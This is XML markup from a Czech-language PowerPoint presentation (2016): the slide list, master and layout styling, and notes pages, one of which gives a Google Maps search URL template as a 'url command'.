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61" r:id="rId2"/>
    <p:sldId id="289" r:id="rId3"/>
    <p:sldId id="265" r:id="rId4"/>
    <p:sldId id="302" r:id="rId5"/>
    <p:sldId id="303" r:id="rId6"/>
    <p:sldId id="343" r:id="rId7"/>
    <p:sldId id="304" r:id="rId8"/>
    <p:sldId id="305" r:id="rId9"/>
    <p:sldId id="306" r:id="rId10"/>
    <p:sldId id="307" r:id="rId11"/>
    <p:sldId id="309" r:id="rId12"/>
    <p:sldId id="308" r:id="rId13"/>
    <p:sldId id="276" r:id="rId14"/>
    <p:sldId id="280" r:id="rId15"/>
    <p:sldId id="311" r:id="rId16"/>
    <p:sldId id="310" r:id="rId17"/>
    <p:sldId id="312" r:id="rId18"/>
    <p:sldId id="277" r:id="rId19"/>
    <p:sldId id="344" r:id="rId20"/>
    <p:sldId id="313" r:id="rId21"/>
    <p:sldId id="278" r:id="rId22"/>
    <p:sldId id="283" r:id="rId23"/>
    <p:sldId id="284" r:id="rId24"/>
    <p:sldId id="279" r:id="rId25"/>
    <p:sldId id="281" r:id="rId26"/>
    <p:sldId id="285" r:id="rId27"/>
    <p:sldId id="315" r:id="rId28"/>
    <p:sldId id="316" r:id="rId29"/>
    <p:sldId id="320" r:id="rId30"/>
    <p:sldId id="317" r:id="rId31"/>
    <p:sldId id="286" r:id="rId32"/>
    <p:sldId id="321" r:id="rId33"/>
    <p:sldId id="322" r:id="rId34"/>
    <p:sldId id="323" r:id="rId35"/>
    <p:sldId id="324" r:id="rId36"/>
    <p:sldId id="325" r:id="rId37"/>
    <p:sldId id="326" r:id="rId38"/>
    <p:sldId id="327" r:id="rId39"/>
    <p:sldId id="290" r:id="rId40"/>
    <p:sldId id="328" r:id="rId41"/>
    <p:sldId id="291" r:id="rId42"/>
    <p:sldId id="292" r:id="rId43"/>
    <p:sldId id="282" r:id="rId44"/>
    <p:sldId id="295" r:id="rId45"/>
    <p:sldId id="297" r:id="rId46"/>
    <p:sldId id="298" r:id="rId47"/>
    <p:sldId id="329" r:id="rId48"/>
    <p:sldId id="331" r:id="rId49"/>
    <p:sldId id="330" r:id="rId50"/>
    <p:sldId id="299" r:id="rId51"/>
    <p:sldId id="332" r:id="rId52"/>
    <p:sldId id="333" r:id="rId53"/>
    <p:sldId id="334" r:id="rId54"/>
    <p:sldId id="335" r:id="rId55"/>
    <p:sldId id="300" r:id="rId56"/>
    <p:sldId id="336" r:id="rId57"/>
    <p:sldId id="337" r:id="rId58"/>
    <p:sldId id="338" r:id="rId59"/>
    <p:sldId id="339" r:id="rId60"/>
    <p:sldId id="301" r:id="rId61"/>
    <p:sldId id="342" r:id="rId62"/>
    <p:sldId id="314" r:id="rId63"/>
    <p:sldId id="294" r:id="rId64"/>
    <p:sldId id="296" r:id="rId65"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
  <p:notesSz cx="6623050" cy="9810750"/>
  <p:defaultTextStyle>
    <a:defPPr>
      <a:defRPr lang="cs-CZ"/>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9900"/>
    <a:srgbClr val="CC0000"/>
    <a:srgbClr val="009900"/>
    <a:srgbClr val="1E44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8276" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="112" d="100"/>
          <a:sy n="112" d="100"/>
        </p:scale>
        <p:origin x="158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12"/>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bwMode="auto">
          <a:xfrm>
            <a:off x="0"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defTabSz="904875">
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Zástupný symbol pro datum 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3751263"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algn="r" defTabSz="904875">
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{01A015F9-6446-4330-BDEB-D9BF65286A33}" type="datetimeFigureOut">
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:pPr/>
              <a:t>01.10.2016</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Zástupný symbol pro číslo snímku 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3751263" y="9340850"/>
            <a:ext cx="287020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algn="r" defTabSz="904875">
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{CD42045F-517F-4799-9DA7-869ACD22BDC3}" type="slidenum">
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Zástupný symbol pro zápatí 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="9318625"/>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defTabSz="904875">
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="411729482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bwMode="auto">
          <a:xfrm>
            <a:off x="0"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defTabSz="904875">
              <a:defRPr sz="1200">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Zástupný symbol pro datum 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3751263"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algn="r" defTabSz="904875">
              <a:defRPr sz="1200">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{A05B1479-20F9-4BA5-A737-2E252F743E27}" type="datetimeFigureOut">
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:pPr/>
              <a:t>01.10.2016</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Zástupný symbol pro obrázek snímku 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="860425" y="736600"/>
            <a:ext cx="4903788" cy="3678238"/>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bwMode="auto">
          <a:xfrm>
            <a:off x="661988" y="4659313"/>
            <a:ext cx="5299075" cy="441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6" name="Zástupný symbol pro zápatí 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="9318625"/>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defTabSz="904875">
              <a:defRPr sz="1200">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Zástupný symbol pro číslo snímku 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3751263" y="9318625"/>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algn="r" defTabSz="904875">
              <a:defRPr sz="1200">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{32E7A279-47A4-407E-B025-7A30B1592D9A}" type="slidenum">
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11560526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Zástupný symbol pro poznámky 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Zástupný symbol pro záhlaví 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="hdr" sz="quarter"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="904875" eaLnBrk="0" hangingPunct="0">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="735013" indent="-282575" defTabSz="904875" eaLnBrk="0" hangingPunct="0">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1131888" indent="-227013" defTabSz="904875" eaLnBrk="0" hangingPunct="0">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1584325" indent="-225425" defTabSz="904875" eaLnBrk="0" hangingPunct="0">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2036763" indent="-225425" defTabSz="904875" eaLnBrk="0" hangingPunct="0">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2493963" indent="-225425" defTabSz="904875" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2951163" indent="-225425" defTabSz="904875" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3408363" indent="-225425" defTabSz="904875" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3865563" indent="-225425" defTabSz="904875"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latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Zástupný symbol pro zápatí 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="904875" eaLnBrk="0" hangingPunct="0">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="735013" indent="-282575" defTabSz="904875" eaLnBrk="0" hangingPunct="0">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1131888" indent="-227013" defTabSz="904875" eaLnBrk="0" hangingPunct="0">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1584325" indent="-225425" defTabSz="904875" eaLnBrk="0" hangingPunct="0">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2036763" indent="-225425" defTabSz="904875" eaLnBrk="0" hangingPunct="0">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2493963" indent="-225425" defTabSz="904875" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2951163" indent="-225425" defTabSz="904875" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3408363" indent="-225425" defTabSz="904875" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3865563" indent="-225425" defTabSz="904875"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latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Zástupný symbol pro číslo snímku 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="904875" eaLnBrk="0" hangingPunct="0">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="735013" indent="-282575" defTabSz="904875" eaLnBrk="0" hangingPunct="0">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1131888" indent="-227013" defTabSz="904875" eaLnBrk="0" hangingPunct="0">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1584325" indent="-225425" defTabSz="904875" eaLnBrk="0" hangingPunct="0">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2036763" indent="-225425" defTabSz="904875" eaLnBrk="0" hangingPunct="0">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2493963" indent="-225425" defTabSz="904875" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2951163" indent="-225425" defTabSz="904875" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3408363" indent="-225425" defTabSz="904875" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3865563" indent="-225425" defTabSz="90487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3E4C81-3DC1-4AC2-B8B7-B22DA7DB60BF}" type="slidenum">
              <a:rPr lang="cs-CZ" altLang="cs-CZ">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ">
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="544182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latin typeface="Calibri"/>
              </a:rPr>
              <a:t>url command: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
              </a:rPr>
              <a:t>http://maps.google.com/maps?f=q&amp;source=s_q&amp;hl=en&amp;q=from+my+home+address+to+%s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="cs-CZ">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="cs-CZ">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Zástupný symbol pro záhlaví 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="hdr" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Zástupný symbol pro zápatí 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Zástupný symbol pro číslo snímku 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{32E7A279-47A4-407E-B025-7A30B1592D9A}" type="slidenum">
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:pPr/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="296012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SzPct val="100000"/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2700"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="628650" indent="-266700">
              <a:buClrTx/>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2300"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:buClrTx/>
              <a:buSzPct val="100000"/>
              <a:defRPr sz="2300"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1343025" indent="-266700">
              <a:defRPr sz="2300"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1704975" indent="-266700">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2300"/>
            </a:lvl5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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{6C78BE9E-318D-4853-9A9F-91FABED40976}" type="slidenum">
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5"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279995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3238" y="908050"/>
            <a:ext cx="8229600" cy="792163"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ"/>
              <a:t>Kliknutím lze upravit styl.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Zástupný symbol pro obsah 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503238" y="1871663"/>
            <a:ext cx="8229600" cy="4149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číslo snímku 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503238" y="6573838"/>
            <a:ext cx="396875" cy="284162"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{4E0949E4-F30C-451B-BA80-117ED8BC22DB}" type="slidenum">
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Zástupný symbol pro zápatí 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="900113" y="6572250"/>
            <a:ext cx="2895600" cy="285750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:t>I      </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
